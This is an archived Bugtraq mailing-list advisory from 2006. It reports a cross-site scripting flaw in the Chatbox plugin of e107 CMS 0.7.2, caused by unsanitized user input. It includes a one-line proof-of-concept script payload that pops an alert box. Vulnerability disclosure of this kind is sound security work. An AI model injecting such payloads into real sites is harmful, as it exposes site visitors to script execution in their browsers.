Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

e107 CMS 0.7.2 Chatbox plugin XSS vulnerability

From: ssteam.pl () gmail com
Date: Sat, 18 Feb 2006 10:08:35 +0100

Software:         e107 CMS 0.7.2
Software Details: Chatbox Plugin v1.0
Class:            Remote
Type:             XSS


========== Desription ===========
XSS vulnerability exists in  e107 0.7.2  CMS.
user input is not correctly sanitized in Chatbox Plugin v1.0.



========== Exploit =============
just paste sample code to a Chatbox:
<script>alert("xss vuln found by ssteam")</script>



Discovered by: marc & shb  (ssteam.pl () gmail com)

Regards,
marc & shb
Previous By Date Next
Previous By Thread Next

Current thread: